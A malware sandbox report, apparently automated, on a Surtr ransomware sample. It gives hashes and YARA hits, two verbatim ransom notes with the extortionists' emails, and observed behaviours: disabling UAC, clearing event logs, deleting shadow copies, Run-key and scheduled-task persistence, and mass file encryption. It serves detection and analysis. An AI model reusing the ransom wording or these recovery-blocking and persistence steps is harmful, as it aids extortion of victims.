surtr | 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

Resubmissions

01-11-2022 14:02

221101-rckx8sddcn 10

24-12-2021 07:08

211224-hx8qcscee3 10

Analysis

max time kernel
121s
max time network
152s
platform
windows10_x64
resource
win10-en-20211208
submitted
24-12-2021 07:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

surtr.exe
Size

320KB
MD5

e6fc190168519d6a6c4f1519e9450f0f
SHA1

af2080ddf1064fb80c7b9af942aaabf264441098
SHA256

8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA512

4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Score

10^/10

surtr evasion persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.txt

Ransom Note

What happened to your files? Unfortunately, your server was compromised, using a security hole in your server. All your files are encrypted with a military algorithm . in order to contact us you can email this address DecryptMyData@mailfence.com use this ID( T3ygNWO3fdq7nC ) for the title of your email. if you weren't able to contact us within 24 hours please email : Decrypter@msgsafe.io Only we can decrypt your files. Please do not contact separate fraudulent sites. You can use freeand even paid software on the Internet, but it is uselessand will cause you to lose filesand timeand money.

Emails

DecryptMyData@mailfence.com

Decrypter@msgsafe.io

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Family

surtr

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . If you do not pay the fee within one month , your important files will be published in our public belog . Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address DecryptMyData@mailfence.com use this ID (T3ygNWO3fdq7nC) for the title of your email . If you weren't able to contact us within 24 hours please email : Decrypter@msgsafe.io If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

DecryptMyData@mailfence.com

Decrypter@msgsafe.io

Signatures

Detects Surtr Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3680-116-0x0000000140133F50-mapping.dmp	family_surtr
behavioral2/memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
4988	wevtutil.exe
2084
4236	wevtutil.exe
4920	wevtutil.exe
264
1224	wevtutil.exe
4184	wevtutil.exe
4916	wevtutil.exe
1252
1216
4556
5032
4360	wevtutil.exe
4984	wevtutil.exe
1964
276
3520
3324
4548
2332
4416
4904
3724
280	wevtutil.exe
4512	wevtutil.exe
1016
4488	wevtutil.exe
5052
4812
5024
4176
2116
5000	wevtutil.exe
3920
592
3864	wevtutil.exe
904	wevtutil.exe
3720	wevtutil.exe
4976
4536
5116
4932
4564
2300
4316
3772	wevtutil.exe
4012
3440	wevtutil.exe
4144
636
4416
1480
5020	wevtutil.exe
1068	wevtutil.exe
4428	wevtutil.exe
3380
932
592	wevtutil.exe
4904	wevtutil.exe
4872	wevtutil.exe
5108
3124
816
4004

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4776 bcdedit.exe
1036 bcdedit.exe
Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
4776	bcdedit.exe
1036	bcdedit.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3680-115-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/3680-117-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp	upx

Drops startup file 6 IoCs

Processes:

cmd.exenet1.exenet.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	net1.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	net1.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	net.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	net.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

cmd.exereg.exereg.execmd.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	cmd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	cmd.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exesurtr.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\E:	surtr.exe
File opened (read-only)	\??\L:	surtr.exe
File opened (read-only)	\??\P:	surtr.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	surtr.exe
File opened (read-only)	\??\B:	surtr.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\K:	surtr.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\F:	surtr.exe
File opened (read-only)	\??\I:	surtr.exe
File opened (read-only)	\??\O:	surtr.exe
File opened (read-only)	\??\Q:	surtr.exe
File opened (read-only)	\??\R:	surtr.exe
File opened (read-only)	\??\T:	surtr.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\H:	surtr.exe
File opened (read-only)	\??\W:	surtr.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\J:	surtr.exe
File opened (read-only)	\??\N:	surtr.exe
File opened (read-only)	\??\V:	surtr.exe
File opened (read-only)	\??\Z:	surtr.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\M:	surtr.exe
File opened (read-only)	\??\S:	surtr.exe
File opened (read-only)	\??\U:	surtr.exe
File opened (read-only)	\??\X:	surtr.exe
File opened (read-only)	\??\Y:	surtr.exe
File opened (read-only)	\??\A:	surtr.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

surtr.exe

description pid process target process

PID 2668 set thread context of 3680 2668 surtr.exe surtr.exe

description	pid	process	target process
PID 2668 set thread context of 3680	2668	surtr.exe	surtr.exe

Drops file in Program Files directory 64 IoCs

Processes:

surtr.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons2x.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ul-oob.xrm-ms.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.EditorRibbon.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\THMBNAIL.PNG.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\BCSRuntimeRes.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\System.Xml.Linq.Resources.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\THMBNAIL.PNG.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nb.txt.[DecryptMyData@mailfence.com].SURT	surtr.exe
File created	C:\Program Files\Java\jre1.8.0_66\SURTR_README.hta	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Grace-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Common.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\GFX.DLL.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\RMNSQUE.ELM.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-utility-l1-1-0.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\PROCDB.XLAM.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\ui-strings.js.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.INF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\ui-strings.js.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\plugin.js.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond.xml.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\MSSOAPR3.DLL.[DecryptMyData@mailfence.com].SURT	surtr.exe
File created	C:\Program Files (x86)\Windows NT\Private_DATA.surt	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\ui-strings.js.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\ui-strings.js.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_bn.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SFBAPPSDK.DLL.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\WT61ES.LEX.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected-hover.svg.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_sv.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Grace-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_partialselected-default_18.svg.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ro_get.svg.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri Light-Constantia.xml.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpResL.dll.mui.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-100.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\logger\libconsole_logger_plugin.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark-2x.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Retail-ul-phn.xrm-ms.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\wordvisi.ttf.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNG.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\PortalConnectCore.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1304 schtasks.exe
4872 schtasks.exe
2472

pid	process
1304	schtasks.exe
4872	schtasks.exe
2472

Interacts with shadow copies 2 TTPs 26 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
508	vssadmin.exe
4032	vssadmin.exe
2292	vssadmin.exe
3796	vssadmin.exe
3700	vssadmin.exe
4288	vssadmin.exe
3324	vssadmin.exe
1360	vssadmin.exe
1796	vssadmin.exe
4132	vssadmin.exe
4200	vssadmin.exe
2224	vssadmin.exe
4308	vssadmin.exe
2156	vssadmin.exe
1184	vssadmin.exe
1188	vssadmin.exe
4080	vssadmin.exe
4192	vssadmin.exe
2928	vssadmin.exe
3788	vssadmin.exe
3916	vssadmin.exe
3772	vssadmin.exe
1340	vssadmin.exe
4040	vssadmin.exe
4152	vssadmin.exe
4256	vssadmin.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

pid process

984
Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

surtr.exe

pid process

3680 surtr.exe
3680 surtr.exe

pid	process
984

pid	process
3680	surtr.exe
3680	surtr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

vssvc.exenet1.execmd.exewevtutil.exewevtutil.execmd.exenet.exenet.exenet1.exenet.exenet.exenet1.exenet.exewevtutil.exewevtutil.exenet.exewevtutil.exenet.exenet1.exewevtutil.execmd.exewevtutil.exenet1.exenet1.exewevtutil.exewevtutil.exewevtutil.exenet.execmd.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeBackupPrivilege	2008	vssvc.exe
Token: SeRestorePrivilege	2008	vssvc.exe
Token: SeAuditPrivilege	2008	vssvc.exe
Token: SeSecurityPrivilege	3320	net1.exe
Token: SeBackupPrivilege	3320	net1.exe
Token: SeSecurityPrivilege	4528	cmd.exe
Token: SeBackupPrivilege	4528	cmd.exe
Token: SeSecurityPrivilege	2616	wevtutil.exe
Token: SeBackupPrivilege	2616	wevtutil.exe
Token: SeSecurityPrivilege	3048	wevtutil.exe
Token: SeBackupPrivilege	3048	wevtutil.exe
Token: SeSecurityPrivilege	4628	cmd.exe
Token: SeBackupPrivilege	4628	cmd.exe
Token: SeSecurityPrivilege	4608	net.exe
Token: SeBackupPrivilege	4608	net.exe
Token: SeSecurityPrivilege	4548	net.exe
Token: SeBackupPrivilege	4548	net.exe
Token: SeSecurityPrivilege	3860	net1.exe
Token: SeBackupPrivilege	3860	net1.exe
Token: SeSecurityPrivilege	1780	net.exe
Token: SeBackupPrivilege	1780	net.exe
Token: SeSecurityPrivilege	4180	net.exe
Token: SeBackupPrivilege	4180	net.exe
Token: SeSecurityPrivilege	5056	net1.exe
Token: SeBackupPrivilege	5056	net1.exe
Token: SeSecurityPrivilege	2320	net.exe
Token: SeBackupPrivilege	2320	net.exe
Token: SeSecurityPrivilege	5092	wevtutil.exe
Token: SeBackupPrivilege	5092	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	1380	net.exe
Token: SeBackupPrivilege	1380	net.exe
Token: SeSecurityPrivilege	4812	wevtutil.exe
Token: SeBackupPrivilege	4812	wevtutil.exe
Token: SeSecurityPrivilege	4892	net.exe
Token: SeBackupPrivilege	4892	net.exe
Token: SeSecurityPrivilege	3240	net1.exe
Token: SeBackupPrivilege	3240	net1.exe
Token: SeSecurityPrivilege	284	wevtutil.exe
Token: SeBackupPrivilege	284	wevtutil.exe
Token: SeSecurityPrivilege	1488	cmd.exe
Token: SeBackupPrivilege	1488	cmd.exe
Token: SeSecurityPrivilege	4868	wevtutil.exe
Token: SeBackupPrivilege	4868	wevtutil.exe
Token: SeSecurityPrivilege	3088	net1.exe
Token: SeBackupPrivilege	3088	net1.exe
Token: SeSecurityPrivilege	3984	net1.exe
Token: SeBackupPrivilege	3984	net1.exe
Token: SeSecurityPrivilege	4080	wevtutil.exe
Token: SeBackupPrivilege	4080	wevtutil.exe
Token: SeSecurityPrivilege	4996	wevtutil.exe
Token: SeBackupPrivilege	4996	wevtutil.exe
Token: SeSecurityPrivilege	4336	wevtutil.exe
Token: SeBackupPrivilege	4336	wevtutil.exe
Token: SeSecurityPrivilege	4352	net.exe
Token: SeBackupPrivilege	4352	net.exe
Token: SeSecurityPrivilege	4112	cmd.exe
Token: SeBackupPrivilege	4112	cmd.exe
Token: SeSecurityPrivilege	3040	wevtutil.exe
Token: SeBackupPrivilege	3040	wevtutil.exe
Token: SeSecurityPrivilege	4236	wevtutil.exe
Token: SeBackupPrivilege	4236	wevtutil.exe
Token: SeSecurityPrivilege	4476	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

surtr.exesurtr.execmd.exe

description	pid	process	target process
PID 2668 wrote to memory of 3680	2668	surtr.exe	surtr.exe
PID 2668 wrote to memory of 3680	2668	surtr.exe	surtr.exe
PID 2668 wrote to memory of 3680	2668	surtr.exe	surtr.exe
PID 2668 wrote to memory of 3680	2668	surtr.exe	surtr.exe
PID 2668 wrote to memory of 3680	2668	surtr.exe	surtr.exe
PID 2668 wrote to memory of 3680	2668	surtr.exe	surtr.exe
PID 2668 wrote to memory of 3680	2668	surtr.exe	surtr.exe
PID 3680 wrote to memory of 2332	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2332	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 4032	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 4032	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2260	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2260	3680	surtr.exe	cmd.exe
PID 2260 wrote to memory of 1184	2260	cmd.exe	chcp.com
PID 2260 wrote to memory of 1184	2260	cmd.exe	chcp.com
PID 3680 wrote to memory of 772	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 772	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1520	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1520	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1732	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1732	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3060	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3060	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3744	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3744	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3984	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3984	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3520	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3520	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3920	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3920	3680	surtr.exe	cmd.exe
